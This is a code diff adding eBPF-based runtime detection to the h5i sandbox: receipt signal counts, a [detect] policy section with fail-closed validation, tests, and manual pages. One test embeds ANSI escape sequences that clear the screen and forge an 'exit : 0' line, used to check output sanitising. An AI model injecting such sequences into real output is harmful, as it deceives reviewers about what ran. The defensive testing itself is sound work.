+    fn a_record_without_a_runtime_block_still_reads() {
+        let dir = TempDir::new().unwrap();
+        let rec = append(dir.path(), input(), b"out").unwrap();
+        assert!(rec.runtime.is_none());
+        let text = std::fs::read_to_string(dir.path().join(LOG_FILE)).unwrap();
+        assert!(!text.contains("runtime"), "{text}");
+        assert!(find(dir.path(), &rec.id).unwrap().runtime.is_none());
+    }
+
+    /// Rendering must never let a box's exemplar rewrite the lines above it.
+    #[test]
+    fn rendering_a_runtime_block_neutralises_control_sequences() {
+        let mut rec = append(TempDir::new().unwrap().path(), input(), b"").unwrap();
+        rec.runtime = Some(h5i_bpf::RuntimeEvidence {
+            lane: h5i_bpf::evidence::LANE.into(),
+            scope: "pidtree".into(),
+            coverage: h5i_bpf::Coverage::Full,
+            coverage_reason: None,
+            events_seen: 1,
+            events_lost: 0,
+            events_filtered: 0,
+            detections: vec![h5i_bpf::Detection {
+                rule: "kernel.bpf".into(),
+                family: "kernel".into(),
+                severity: h5i_bpf::Severity::Alert,
+                title: "called bpf(2)".into(),
+                count: 1,
+                first_ns: 1,
+                last_ns: 1,
+                examples: vec!["bpf(cmd=5)\x1b[2J\x1b[Hexit     : 0".into()],
+                examples_truncated: false,
+            }],
+            unavailable: None,
+        });
+        let text = render(&rec, b"");
+        assert!(!text.contains('\x1b'), "{text}");
+        assert!(text.contains("kernel.bpf"), "{text}");
+    }
+
+    /// An unwatched run's block must read as unwatched, never as clean.
+    #[test]
+    fn an_unavailable_runtime_block_renders_its_reason() {
+        let mut rec = append(TempDir::new().unwrap().path(), input(), b"").unwrap();
+        rec.runtime = Some(h5i_bpf::RuntimeEvidence::unavailable("missing CAP_BPF"));
+        let text = render(&rec, b"");
+        assert!(text.contains("not observed"), "{text}");
+        assert!(text.contains("CAP_BPF"), "{text}");
+    }
+
 }

--- a/crates/h5i-core/src/server.rs
+++ b/crates/h5i-core/src/server.rs
@@ -415,6 +415,39 @@ pub struct Signals {
     /// applies to such pairs — and also for envs whose receipts never carried
     /// the check; the pane only speaks when there is something recorded.
     pub fs_overlap: Vec<String>,
+    /// Receipts whose kernel-observed lane actually watched the run
+    /// (ROADMAP.md D10).
+    ///
+    /// Its own count, beside `host_observed` rather than inside it, for the
+    /// same reason `runner_observed` is its own: they are different claims. A
+    /// host-observed run is one h5i was the parent of; a kernel-watched run is
+    /// one an eBPF collector saw from underneath. The second is strictly
+    /// harder for a box to defeat and strictly narrower in what it covers, and
+    /// collapsing them would lose both facts.
+    #[serde(default)]
+    pub kernel_watched: usize,
+    /// Receipts that carry a runtime block which observed nothing — the probe
+    /// could not attach, or the tier is one a host probe cannot see into.
+    ///
+    /// Counted separately and shown, because the whole point of writing the
+    /// block anyway is that "not watched" must never render as "watched and
+    /// quiet".
+    #[serde(default)]
+    pub kernel_unwatched: usize,
+    /// Matches at `alert` severity, summed across watched runs.
+    #[serde(default)]
+    pub kernel_alerts: u64,
+    /// Matches at `notice` severity.
+    #[serde(default)]
+    pub kernel_notices: u64,
+    /// Events the kernel or the reader dropped. Nonzero means every count
+    /// above is a lower bound, and the pane says so rather than implying
+    /// completeness.
+    #[serde(default)]
+    pub kernel_events_lost: u64,
+    /// Distinct rule ids that fired, capped like `denied_hosts`.
+    #[serde(default)]
+    pub kernel_rules: Vec<String>,
 }
 
 /// [`signals`], for a test in another module of this crate.
@@ -434,6 +467,7 @@ fn signals(m: &EnvManifest, receipts: &[ExecRecord]) -> Signals {
         ..Default::default()
     };
     let mut denied_hosts: Vec<String> = Vec::new();
+    let mut kernel_rules: Vec<String> = Vec::new();
     for r in receipts {
         if r.exit_code.is_some_and(|c| c != 0) {
             s.failed += 1;
@@ -473,6 +507,24 @@ fn signals(m: &EnvManifest, receipts: &[ExecRecord]) -> Signals {
         if matches!(r.source.as_str(), "host-env-run" | "host-env-shell") {
             s.fs_overlap = r.fs_overlap.clone();
         }
+        if let Some(rt) = &r.runtime {
+            if rt.observed() {
+                s.kernel_watched += 1;
+            } else {
+                s.kernel_unwatched += 1;
+            }
+            s.kernel_events_lost += rt.events_lost;
+            for d in &rt.detections {
+                match d.severity {
+                    h5i_bpf::Severity::Alert => s.kernel_alerts += d.count,
+                    h5i_bpf::Severity::Notice => s.kernel_notices += d.count,
+                    h5i_bpf::Severity::Info => {}
+                }
+                if !kernel_rules.contains(&d.rule) {
+                    kernel_rules.push(d.rule.clone());
+                }
+            }
+        }
         if let Some(sh) = &r.share {
             s.shares += 1;
             if sh.third_party_can_read() {
@@ -483,6 +535,9 @@ fn signals(m: &EnvManifest, receipts: &[ExecRecord]) -> Signals {
     }
     denied_hosts.truncate(DENIED_HOSTS_CAP);
     s.denied_hosts = denied_hosts;
+    kernel_rules.sort();
+    kernel_rules.truncate(DENIED_HOSTS_CAP);
+    s.kernel_rules = kernel_rules;
     s.fs_overlap.truncate(DENIED_HOSTS_CAP);
     // Receipts are appended in order and their timestamps sort lexically.
     s.last_run_ts = receipts.last().map(|r| r.timestamp.clone());
@@ -494,9 +549,17 @@ fn signals(m: &EnvManifest, receipts: &[ExecRecord]) -> Signals {
     s.box_claimed_only = s.runs > 0 && s.host_observed == 0 && s.runner_observed == 0;
     s.authority_unconfined =
         m.fs_authority.is_some_and(|a| !a.confined() || a.symlink_clean == Some(false));
+    // A kernel-observed alert raises `attention`, never `denial`, and the
+    // difference is not pedantry. `denial` means *something was refused* — the
+    // egress proxy said no, the authority validator found a grant outside the
+    // declared set — and this lane refuses nothing: it reports that a box read
+    // a credential file, not that it was stopped. Folding it into `denial`
+    // would quietly redefine the one word on this screen that currently has a
+    // precise meaning (`box-console-honesty-model`). The count is shown on its
+    // own, which is the honest way to make it loud.
     s.verdict = if s.egress_denied > 0 || s.authority_unconfined {
         "denial"
-    } else if s.failed > 0 || s.timed_out > 0 || s.browser_issues > 0 {
+    } else if s.failed > 0 || s.timed_out > 0 || s.browser_issues > 0 || s.kernel_alerts > 0 {
         "attention"
     } else {
         "clean"
@@ -1127,6 +1190,7 @@ mod tests {
             egress: None,
             browser: None,
             share: None,
+            runtime: None,
             redactions: vec![],
             raw_oid: "d".repeat(64),
             raw_size: 0,

--- a/crates/h5i-sandbox/src/sandbox.rs
+++ b/crates/h5i-sandbox/src/sandbox.rs
@@ -190,6 +190,24 @@ struct ProfileToml {
     /// `[profile.X.browser]` — what the box may do with the browser.
     #[serde(default)]
     browser: BrowserToml,
+    /// `[profile.X.detect]` — the runtime-detection lane (ROADMAP.md D11).
+    #[serde(default)]
+    detect: DetectToml,
+}
+
+/// `[profile.X.detect] enabled = true`.
+///
+/// Every field is `Option`, and omitting one inherits the base rather than
+/// resetting it — the same rule `net.egress` and `net.unix` follow, so a
+/// partial overlay can never quietly *widen* or *narrow* what it did not
+/// mention.
+#[derive(Debug, Default, Deserialize)]
+#[serde(deny_unknown_fields)]
+struct DetectToml {
+    enabled: Option<bool>,
+    require: Option<bool>,
+    buffer_kb: Option<u32>,
+    rules: Option<Vec<String>>,
 }
 
 /// `[profile.X.browser] deny = ["evaluate"]`.
@@ -495,6 +513,17 @@ pub fn load_profile(
                     ),
                     None => base.engine,
                 },
+                detect: crate::sandbox_policy::DetectPolicy {
+                    enabled: t.detect.enabled.unwrap_or(base.detect.enabled),
+                    require: t.detect.require.unwrap_or(base.detect.require),
+                    buffer_kb: t.detect.buffer_kb.unwrap_or(base.detect.buffer_kb),
+                    rules: t
+                        .detect
+                        .rules
+                        .clone()
+                        .map(|list| list.iter().map(|e| e.trim().to_string()).collect())
+                        .unwrap_or_else(|| base.detect.rules.clone()),
+                },
             }
         }
     };
@@ -687,6 +716,37 @@ pub fn validate_profile(p: &Profile) -> Result<(), H5iError> {
     // doing the thing.
     for entry in &p.browser_deny {
         crate::sandbox_policy::validate_browser_deny(entry).map_err(H5iError::Metadata)?;
+    }
+
+    // The same argument as the browser-deny lint above, for the same reason: a
+    // `detect` section that is on and selects nothing watches nothing while the
+    // policy reads as though it were watching. The rule *names* are the
+    // collector's vocabulary and are checked there (a policy crate that knew
+    // them would have to depend on the collector); what is checked here is
+    // everything that can be judged without it.
+    if p.detect.enabled {
+        if p.detect.rules.is_empty() {
+            return Err(H5iError::Metadata(format!(
+                "profile '{}': [detect] is enabled with an empty `rules` list, which watches for \
+                 nothing while the policy reads as though it watched. Use `rules = [\"*\"]` for \
+                 everything, or drop `enabled` (fail-closed).",
+                p.name
+            )));
+        }
+        if p.detect.rules.iter().any(|r| r.is_empty()) {
+            return Err(H5iError::Metadata(format!(
+                "profile '{}': [detect] `rules` contains an empty entry, which selects no rule \
+                 (fail-closed).",
+                p.name
+            )));
+        }
+    } else if p.detect.require {
+        return Err(H5iError::Metadata(format!(
+            "profile '{}': [detect] sets `require = true` with `enabled = false`. That reads as \
+             \"refuse to run unwatched\" and would in fact never watch anything — set \
+             `enabled = true` as well, or drop `require` (fail-closed).",
+            p.name
+        )));
     }
 
     // A profile that opts into an egress allowlist may not also re-export the

--- a/crates/h5i-sandbox/src/sandbox_policy.rs
+++ b/crates/h5i-sandbox/src/sandbox_policy.rs
@@ -383,6 +383,62 @@ pub struct HomeBind {
 
 // ─── policy profile (§7) ────────────────────────────────────────────────────
 
+/// `[profile.X.detect]` — the runtime-detection lane (ROADMAP.md D11).
+///
+/// Four fields, all optional, and `enabled` is `false` by default. That
+/// default is a decision, not caution: the collector needs `CAP_BPF`, which an
+/// ordinary install does not have, so turning it on for everybody would
+/// produce a fleet of `unavailable` blocks and teach every user to skip past
+/// the one part of the receipt that is hardest to forge.
+///
+/// This crate holds the *policy*, not the mechanism: `h5i-bpf` sits beside
+/// `h5i-sandbox`, not below it, and a policy type that depended on the
+/// collector would make the confinement layer unbuildable without an eBPF
+/// toolchain.
+#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
+pub struct DetectPolicy {
+    /// Attach the probe for runs under this profile.
+    pub enabled: bool,
+    /// Refuse to run at all when the probe cannot attach.
+    ///
+    /// The fail-closed switch, and off by default for the same reason
+    /// `enabled` is: a mandatory detector on a laptop kernel is a tool that
+    /// does not start. It is the right setting for "I am running somebody
+    /// else's dependency tree", and that is a decision an operator makes.
+    pub require: bool,
+    /// Ring-buffer size in KiB, clamped by the collector to its own bounds.
+    pub buffer_kb: u32,
+    /// Rule selectors: ids (`net.direct-egress`), families (`net`), or `*`.
+    ///
+    /// A selector that matches no rule is refused at run time rather than
+    /// ignored — a profile that believes it enabled a rule and silently
+    /// enabled nothing is the exact failure this lane exists to catch.
+    pub rules: Vec<String>,
+}
+
+impl Default for DetectPolicy {
+    fn default() -> Self {
+        Self {
+            enabled: false,
+            require: false,
+            // Mirrors `h5i_bpf::DEFAULT_BUFFER_KB`. Duplicated rather than
+            // imported, because importing it would put the collector below the
+            // sandbox in the dependency graph for the sake of one integer.
+            buffer_kb: 256,
+            rules: vec!["*".to_string()],
+        }
+    }
+}
+
+impl DetectPolicy {
+    /// Is this the default? Drives `skip_serializing_if`, so that every
+    /// profile written before this section existed serializes byte for byte as
+    /// it did — and its pinned policy digest is unchanged.
+    pub fn is_default(&self) -> bool {
+        self == &Self::default()
+    }
+}
+
 /// A fully-resolved policy profile — every field explicit, suitable for
 /// serializing as `policy.resolved.toml` and digesting. Field order is the
 /// canonical serialization order (digest stability depends on it).
@@ -572,6 +628,20 @@ pub struct Profile {
     /// profile's canonical serialization — and its pinned digest — is unchanged.
     #[serde(default, skip_serializing_if = "Vec::is_empty")]
     pub browser_deny: Vec<String>,
+
+    /// The runtime-detection lane (`[profile.X.detect]`, ROADMAP.md D11).
+    ///
+    /// Appended last and skipped when default, so every existing profile's
+    /// canonical serialization — and its pinned digest — is unchanged. It is
+    /// *in* the digest when it is set, deliberately: whether a box was watched
+    /// is part of what its policy claimed, and a reviewer comparing two
+    /// receipts must not find that the difference between them was invisible.
+    ///
+    /// Being a table, it must stay the final field: TOML puts tables after
+    /// scalars, and a scalar declared below this one would serialize into the
+    /// `[profile.detect]` table instead of the profile.
+    #[serde(default, skip_serializing_if = "DetectPolicy::is_default")]
+    pub detect: DetectPolicy,
 }
 
 /// The browser engines a `browser` box can be pinned to.
@@ -858,6 +928,7 @@ impl Profile {
             loopback_ports: Vec::new(),
             engine: None,
             browser_deny: Vec::new(),
+            detect: DetectPolicy::default(),
         }
     }
 
@@ -2327,6 +2398,43 @@ audit_capture = "verbose"
 "#,
         )
         .is_err());
+    }
+    /// A default `[detect]` must not appear in the serialization at all, or
+    /// every pinned policy digest in every existing box changes the day this
+    /// field ships.
+    #[test]
+    fn a_default_detect_section_leaves_the_digest_untouched() {
+        let plain = Profile::builtin("default", IsolationClaim::Process);
+        let toml = toml::to_string(&plain).unwrap();
+        assert!(!toml.contains("detect"), "{toml}");
+    }
+
+    #[test]
+    fn an_enabled_detect_section_is_serialized_and_round_trips() {
+        let mut p = Profile::builtin("default", IsolationClaim::Process);
+        p.detect = DetectPolicy {
+            enabled: true,
+            require: true,
+            buffer_kb: 512,
+            rules: vec!["net".into(), "secret.read".into()],
+        };
+        let toml = toml::to_string(&p).unwrap();
+        assert!(toml.contains("[detect]"), "{toml}");
+        let back: Profile = toml::from_str(&toml).unwrap();
+        assert_eq!(back.detect, p.detect);
+    }
+
+    /// The digest is what a reviewer compares two boxes by. Whether a box was
+    /// watched has to be inside it.
+    #[test]
+    fn enabling_detection_changes_the_policy_digest() {
+        let base = ResolvedPolicy::new(
+            IsolationClaim::Process,
+            Profile::builtin("default", IsolationClaim::Process),
+        );
+        let mut watched = base.clone();
+        watched.profile.detect.enabled = true;
+        assert_ne!(base.digest().unwrap(), watched.digest().unwrap());
     }
 }
 

--- a/docs/manual/index.html
+++ b/docs/manual/index.html
@@ -153,6 +153,7 @@
 <a class="t3" href="#making-a-box">Making a box</a>
 <a class="t3" href="#h5i-box-create">h5i box create</a>
 <a class="t3" href="#working-in-a-box">Working in a box</a>
+<a class="t3" href="#h5i-box-detect">h5i box detect</a>
 <a class="t3" href="#services-and-ports">Services and ports</a>
 <a class="t3" href="#h5i-box-export">h5i box export</a>
 <a class="t3" href="#h5i-box-cache">h5i box cache</a>
@@ -188,6 +189,7 @@
 <a class="t2" href="#policy">Policy</a>
 <div class="t3group">
 <a class="t3" href="#profiles">Profiles</a>
+<a class="t3" href="#runtime-detection">Runtime detection</a>
 <a class="t3" href="#isolation-tiers">Isolation tiers</a>
 <a class="t3" href="#af_unix-sockets">AF_UNIX sockets</a>
 <a class="t3" href="#credentials">Credentials</a>
@@ -196,6 +198,7 @@
 <a class="t2" href="#receipts">Receipts</a>
 <div class="t3group">
 <a class="t3" href="#what-the-browser-saw">What the browser saw</a>
+<a class="t3" href="#what-the-kernel-saw">What the kernel saw</a>
 <a class="t3" href="#what-we-do-not-claim">What we do not claim</a>
 </div>
 <a class="t2" href="#limits">Limits</a>
@@ -205,6 +208,7 @@
 <a class="t3" href="#set-by-you">Set by you</a>
 <a class="t3" href="#set-by-h5i-inside-a-box">Set by h5i, inside a box</a>
 <a class="t3" href="#tests">Tests</a>
+<a class="t3" href="#builds">Builds</a>
 </div>
 <a class="t2" href="#see-also">See also</a>
     </nav>
@@ -423,6 +427,19 @@ h5i box log &lt;name&gt;                    # the box's event log
 <p><code>h5i box shell</code> is the agent-in-box: stdio is inherited, so every command the
 session spawns is contained by the box rather than by the agent choosing to wrap
 each call.</p>
+<h3 id="h5i-box-detect">h5i box detect</h3>
+<p>Runtime detection: what an eBPF collector in the kernel saw inside a box.
+Read-only, and available on every build — the verbs are how you find out why
+the collector is <em>not</em> working, so gating them behind it would hide the answer
+from the hosts that need it.</p>
+<pre><code class="language-bash">h5i box detect probe                  # can this machine watch a box, and if not, why
+h5i box detect rules                  # the whole signature catalogue
+h5i box detect rules --filter secret  # one family, or one rule id
+h5i box detect show &lt;name&gt;            # what fired in this box, worst first
+h5i box detect show &lt;name&gt; --min alert
+</code></pre>
+<p>Turn it on per profile with <code>[profile.&lt;name&gt;.detect] enabled = true</code>; see
+<a href="#runtime-detection">Runtime detection</a> for the section and what it costs.</p>
 <h3 id="services-and-ports">Services and ports</h3>
 <pre><code class="language-bash">h5i box service start &lt;name&gt; &lt;service&gt;   # a declared long-lived process
 h5i box service status &lt;name&gt;
@@ -457,7 +474,7 @@ the only way out, and it is deliberately a human step.</p>
 </tr>
 <tr>
 <td><code>report.md</code></td>
-<td>What ran, what the browser saw, who was at the controls, and the agent's own proposal.</td>
+<td>What ran, what the browser saw, what the kernel saw, who was at the controls, and the agent's own proposal.</td>
 </tr>
 <tr>
 <td><code>receipt.json</code></td>
@@ -477,6 +494,8 @@ replace). Secret redaction and size caps apply to all of it.</p>
 <li><strong>what ran</strong>: every command, its lane, its exit code</li>
 <li><strong>what the browser saw</strong>: console errors, uncaught exceptions and failed
   requests, observed by h5i rather than reported by the agent</li>
+<li><strong>what the kernel saw</strong>: signatures that fired against the syscalls a box
+  actually made, when runtime detection was on for the run</li>
 <li><strong>viewer sessions</strong>: including whether a human took the controls</li>
 <li>the agent's proposal</li>
 </ul>
@@ -1324,6 +1343,63 @@ mem   = &quot;4G&quot;
 procs = 256
 wall  = &quot;30m&quot;
 </code></pre>
+<h3 id="runtime-detection">Runtime detection</h3>
+<p>Everything above this line is about what a box is <em>allowed</em> to do. <code>[detect]</code>
+is about what it actually did, reported from a place the box cannot reach: an
+eBPF collector attached to syscall tracepoints for the length of the run.</p>
+<pre><code class="language-toml">[profile.review.detect]
+enabled   = true      # attach the probe for runs under this profile
+require   = false     # refuse to run when the probe cannot attach
+buffer_kb = 256       # ring buffer size
+rules     = [&quot;*&quot;]     # rule ids, family names, or &quot;*&quot;
+</code></pre>
+<p>It is <strong>observation only</strong>. Nothing in this lane can deny a syscall; denial is
+Landlock, seccomp, the network namespace and the egress proxy, and it stays
+there. What the collector adds is a second opinion on the same run from an
+observer that is neither at the boundary of the box nor inside it: the kernel
+reports <code>execve</code>, <code>connect</code> and <code>openat</code> whether or not anything in the box
+wanted them reported.</p>
+<p><code>enabled</code> is <code>false</code> by default because the collector needs <code>CAP_BPF</code>, which an
+ordinary install does not have. <code>h5i box detect probe</code> says whether this
+machine can watch a box and prints the one command that would change that; h5i
+never runs it for you.</p>
+<p><code>require = true</code> is the fail-closed switch: if the probe cannot attach, the run
+is refused rather than performed unwatched. That is the setting for "I am
+running somebody else's dependency tree". It is off by default because a
+mandatory detector on a laptop kernel is a tool that does not start.</p>
+<p>Coverage differs by tier, and every receipt says which it got:</p>
+<table>
+<thead>
+<tr>
+<th>Tier</th>
+<th>Coverage</th>
+<th>Why</th>
+</tr>
+</thead>
+<tbody>
+<tr>
+<td><code>workspace</code>, <code>process</code>, <code>supervised</code></td>
+<td>full</td>
+<td>the payload is a descendant of h5i, so the kernel-maintained process tree holds it and everything it spawns</td>
+</tr>
+<tr>
+<td><code>container</code></td>
+<td>partial</td>
+<td>the container runtime double-forks, so the workload leaves h5i's process tree; what stays visible is the runtime's own activity on the host</td>
+</tr>
+<tr>
+<td><code>microvm</code></td>
+<td>none</td>
+<td>the workload runs against a guest kernel, which a host probe cannot observe at all</td>
+</tr>
+</tbody>
+</table>
+<p><code>h5i box detect rules</code> prints the whole signature catalogue with what each rule
+is for. <code>h5i box detect show &lt;box&gt;</code> prints what fired, worst first.</p>
+<p>Requirements: Linux 5.8 or newer (<code>BPF_MAP_TYPE_RINGBUF</code>), <code>CAP_BPF</code> and
+<code>CAP_PERFMON</code>, and an h5i built with <code>--features bpf</code> by a <code>clang</code> that can
+target BPF. No BTF, no <code>vmlinux.h</code>, and no kernel headers: the probe reads no
+kernel structure, only syscall tracepoint arguments, which are stable ABI.</p>
 <p><code>wall</code> is enforced everywhere. <strong><code>mem</code> and <code>procs</code> are not enforced at the
 <code>process</code> and <code>supervised</code> tiers on macOS</strong>: Darwin has no cgroups, does not
 enforce <code>RLIMIT_AS</code> against the mmap'd heap every modern runtime uses, and
@@ -1507,6 +1583,8 @@ never blur:</p>
 </tr>
 </tbody>
 </table>
+<p>A record can also carry a <code>runtime</code> block, which is a <em>second observer of the
+same command</em> rather than a lane of its own — see below.</p>
 <h3 id="what-the-browser-saw">What the browser saw</h3>
 <p>A run that drove the browser also carries what the page said back: console
 errors, uncaught exceptions, and requests that failed. h5i collects these itself,
@@ -1515,10 +1593,39 @@ is not the agent's to choose. Only what is new since the last drain is recorded.
 <p>A browser command with <strong>no browser to ask</strong> is recorded as <code>unavailable</code>, not as
 a clean page. "Nothing was looked at" is a different claim from "nothing was
 wrong", and a reviewer has to be able to tell them apart.</p>
+<h3 id="what-the-kernel-saw">What the kernel saw</h3>
+<p>A run under a profile with <code>[detect] enabled = true</code> carries a <code>runtime</code> block:
+which scope selected the events, how completely it covered the tier, how many
+events were seen and how many were lost, and every signature that fired with a
+few examples of what tripped it.</p>
+<p>The block is written <strong>even when the collector could not attach</strong>, carrying the
+reason. That is deliberate and it is the point of the whole lane: a missing
+block and a quiet box would otherwise look identical. Read it this way:</p>
+<ul>
+<li>No <code>runtime</code> block at all — the profile did not ask to be watched.</li>
+<li>A block with <code>unavailable</code> — it asked, and the probe could not attach. The
+  reason is in the block; <code>h5i box detect probe</code> explains it in full.</li>
+<li>A block with <code>coverage: none</code> or <code>partial</code> — some or all of the run happened
+  where this scope cannot reach it, with the reason attached.</li>
+<li>A block with detections and <code>events_lost</code> above zero — the list is a <strong>lower
+  bound</strong>, because events were dropped before anything examined them.</li>
+<li>A block with no detections, <code>coverage: full</code> and <code>events_lost: 0</code> — nothing
+  the catalogue models happened. That is not the same as nothing happening:
+  <code>h5i box detect rules</code> is a finite list, and behaviour no rule models
+  produces no line.</li>
+</ul>
+<p>Every path and command line in the block is a string the box passed to a
+syscall, captured on the way <em>in</em>. It is not the kernel's resolution of that
+string, and the probe sees the attempt rather than the outcome — a <code>connect</code>
+the network namespace refused looks exactly like one that succeeded.</p>
 <h3 id="what-we-do-not-claim">What we do not claim</h3>
 <p>An agent can stage <em>extra</em> records, or stop writing. Both are visible: a gap
 between host-observed exits and box-reported commands is itself a finding. We do
 not claim more than that.</p>
+<p>The kernel lane narrows what "stop writing" buys, and does not close it: the
+collector cannot be defeated by a box declining to cooperate, but it only runs
+where the profile asked and the host could attach, and it only reports what a
+signature models.</p>
 <hr />
 <h2 id="limits">Limits</h2>
 <p>Being explicit about these is a feature, since the claim is a security claim.</p>
@@ -1775,6 +1882,33 @@ the box. <code>h5i box probe</code> names the mechanism and the gaps.</p>
 <tr>
 <td><code>H5I_RUNNER_STATE_DIR</code></td>
 <td>Where a runner worker keeps box state. For driving a worker against a scratch directory; a real runner uses its default.</td>
+</tr>
+<tr>
+<td><code>H5I_BPF_LIVE</code></td>
+<td>Opt in to the live eBPF attach suite. It loads programs into the running kernel, so it needs <code>CAP_BPF</code> and does not run by accident; without it the suite skips and prints why.</td>
+</tr>
+</tbody>
+</table>
+<h3 id="builds">Builds</h3>
+<table>
+<thead>
+<tr>
+<th>Variable</th>
+<th>Purpose</th>
+</tr>
+</thead>
+<tbody>
+<tr>
+<td><code>H5I_BPF_REQUIRE</code></td>
+<td>Fail the build if the eBPF probe cannot be compiled, instead of shipping a binary whose detector reports <code>unavailable</code> forever. Set it in CI and for releases.</td>
+</tr>
+<tr>
+<td><code>CLANG</code></td>
+<td>Which <code>clang</code> compiles the eBPF probe. Otherwise <code>clang</code>, then <code>clang-20</code> down to <code>clang-14</code>, each tested against the BPF target before it is trusted.</td>
+</tr>
+<tr>
+<td><code>H5I_SKIP_WEB_BUILD</code></td>
+<td>Skip the console bundle and leave a stub, for a Rust-only build with no Node on the machine.</td>
 </tr>
 </tbody>
 </table>

--- a/docs/manual/index.html
+++ b/docs/manual/index.html
@@ -1396,10 +1396,42 @@ mandatory detector on a laptop kernel is a tool that does not start.</p>
 </table>
 <p><code>h5i box detect rules</code> prints the whole signature catalogue with what each rule
 is for. <code>h5i box detect show &lt;box&gt;</code> prints what fired, worst first.</p>
-<p>Requirements: Linux 5.8 or newer (<code>BPF_MAP_TYPE_RINGBUF</code>), <code>CAP_BPF</code> and
-<code>CAP_PERFMON</code>, and an h5i built with <code>--features bpf</code> by a <code>clang</code> that can
-target BPF. No BTF, no <code>vmlinux.h</code>, and no kernel headers: the probe reads no
-kernel structure, only syscall tracepoint arguments, which are stable ABI.</p>
+<p>This is opt-in at three separate layers, and all three have to say yes:</p>
+<table>
+<thead>
+<tr>
+<th>Layer</th>
+<th>Switch</th>
+<th>Default</th>
+</tr>
+</thead>
+<tbody>
+<tr>
+<td>build</td>
+<td><code>cargo install --path . --features bpf</code></td>
+<td>off — a stock build and the released binaries carry no probe</td>
+</tr>
+<tr>
+<td>host</td>
+<td><code>CAP_BPF</code> and <code>CAP_PERFMON</code> on the h5i binary</td>
+<td>not granted</td>
+</tr>
+<tr>
+<td>policy</td>
+<td><code>[profile.X.detect] enabled = true</code></td>
+<td>false</td>
+</tr>
+</tbody>
+</table>
+<p><code>h5i box detect probe</code> reports all three and prints the command for whichever
+one is missing.</p>
+<p>Other requirements: Linux 5.8 or newer (<code>BPF_MAP_TYPE_RINGBUF</code>), and a <code>clang</code>
+that can target BPF at build time. No BTF, no <code>vmlinux.h</code>, and no kernel
+headers: the probe reads no kernel structure, only syscall tracepoint
+arguments, which are stable ABI.</p>
+<p>Reading a receipt needs none of it. The evidence types ship in every build, so
+a colleague with a stock h5i can read an export from a machine that had the
+collector.</p>
 <p><code>wall</code> is enforced everywhere. <strong><code>mem</code> and <code>procs</code> are not enforced at the
 <code>process</code> and <code>supervised</code> tiers on macOS</strong>: Darwin has no cgroups, does not
 enforce <code>RLIMIT_AS</code> against the mmap'd heap every modern runtime uses, and

--- a/man/man1/h5i.1
+++ b/man/man1/h5i.1
@@ -224,6 +224,72 @@ Probe what isolation this host can actually provide (Landlock, user namespaces, 
 .TP
 \fB\-h\fR, \fB\-\-help\fR
 Print help
+.SH "H5I BOX DETECT"
+Runtime detection: what the kernel saw inside a box
+.ie \n(.g .ds Aq \(aq
+.el .ds Aq '
+.SS SYNOPSIS
+\fBdetect\fR [\fB\-h\fR|\fB\-\-help\fR] <\fIsubcommands\fR>
+.ie \n(.g .ds Aq \(aq
+.el .ds Aq '
+.SS OPTIONS
+.TP
+\fB\-h\fR, \fB\-\-help\fR
+Print help (see a summary with \*(Aq\-h\*(Aq)
+.SH "H5I BOX DETECT PROBE"
+What this host can do for runtime detection, and what to run if it cannot
+.ie \n(.g .ds Aq \(aq
+.el .ds Aq '
+.SS SYNOPSIS
+\fBprobe\fR [\fB\-\-json\fR] [\fB\-h\fR|\fB\-\-help\fR] 
+.ie \n(.g .ds Aq \(aq
+.el .ds Aq '
+.SS OPTIONS
+.TP
+\fB\-\-json\fR
+
+.TP
+\fB\-h\fR, \fB\-\-help\fR
+Print help
+.SH "H5I BOX DETECT RULES"
+The signature catalogue: every rule, its severity, and what it is for
+.ie \n(.g .ds Aq \(aq
+.el .ds Aq '
+.SS SYNOPSIS
+\fBrules\fR [\fB\-\-filter\fR] [\fB\-\-json\fR] [\fB\-h\fR|\fB\-\-help\fR] 
+.ie \n(.g .ds Aq \(aq
+.el .ds Aq '
+.SS OPTIONS
+.TP
+\fB\-\-filter\fR \fI<FAMILY|ID>\fR
+Only this family (`net`, `secret`, `exec`, `priv`, `kernel`, `mount`) or this exact rule id
+.TP
+\fB\-\-json\fR
+
+.TP
+\fB\-h\fR, \fB\-\-help\fR
+Print help
+.SH "H5I BOX DETECT SHOW"
+What the kernel observed in a box, across all of its receipts
+.ie \n(.g .ds Aq \(aq
+.el .ds Aq '
+.SS SYNOPSIS
+\fBshow\fR [\fB\-\-min\fR] [\fB\-\-json\fR] [\fB\-h\fR|\fB\-\-help\fR] <\fINAME\fR> 
+.ie \n(.g .ds Aq \(aq
+.el .ds Aq '
+.SS OPTIONS
+.TP
+\fB\-\-min\fR \fI<MIN>\fR [default: info]
+Only detections at this severity or above (`info`, `notice`, `alert`)
+.TP
+\fB\-\-json\fR
+
+.TP
+\fB\-h\fR, \fB\-\-help\fR
+Print help
+.TP
+<\fINAME\fR>
+Box name or id
 .SH "H5I BOX CAPABILITIES"
 Machine-readable host enforcement report: isolation tier, egress-enforced yes/no, resource-limit support, and per-claim satisfiable/runnable \(em so a product can adapt to the real host without scraping `env probe` text
 .ie \n(.g .ds Aq \(aq

--- a/src/cli/boxes.rs
+++ b/src/cli/boxes.rs
@@ -161,6 +161,18 @@ pub enum BoxCommands {
     /// namespaces, seccomp) and which claims are satisfiable.
     Probe,
 
+    /// Runtime detection: what the kernel saw inside a box.
+    ///
+    /// A second observer of the same run, in a lane the box cannot reach: an
+    /// eBPF collector reports `execve`, `connect` and `openat` whether or not
+    /// anything in the box wanted them reported. Observation only — nothing
+    /// here denies anything — and off unless a profile's `[detect]` section
+    /// turns it on. `h5i box detect probe` says whether this machine can.
+    Detect {
+        #[command(subcommand)]
+        action: crate::cli::detect::DetectCommands,
+    },
+
     /// Machine-readable host enforcement report: isolation tier, egress-enforced
     /// yes/no, resource-limit support, and per-claim satisfiable/runnable — so a
     /// product can adapt to the real host without scraping `env probe` text.
@@ -1134,6 +1146,10 @@ pub fn run(action: BoxCommands) -> anyhow::Result<()> {
                     }
                 }
 
+                BoxCommands::Detect { action } => {
+                    return crate::cli::detect::run(action);
+                }
+
                 BoxCommands::Probe => {
                     // Diagnostics must report the live truth, not last run's
                     // verdict — bypass the per-boot podman probe cache.
@@ -1218,6 +1234,25 @@ pub fn run(action: BoxCommands) -> anyhow::Result<()> {
                         "  microvm      = {}",
                         caps.microvm_runtime.as_deref().unwrap_or("none")
                     );
+                    {
+                        // Deliberately last, and deliberately labelled. Every
+                        // line above is about what the host can *stop*; this
+                        // one is about what it can *see*, and mixing the two
+                        // readings is how an observability feature ends up
+                        // quoted as a containment claim.
+                        let d = h5i_core::bpf::probe_host();
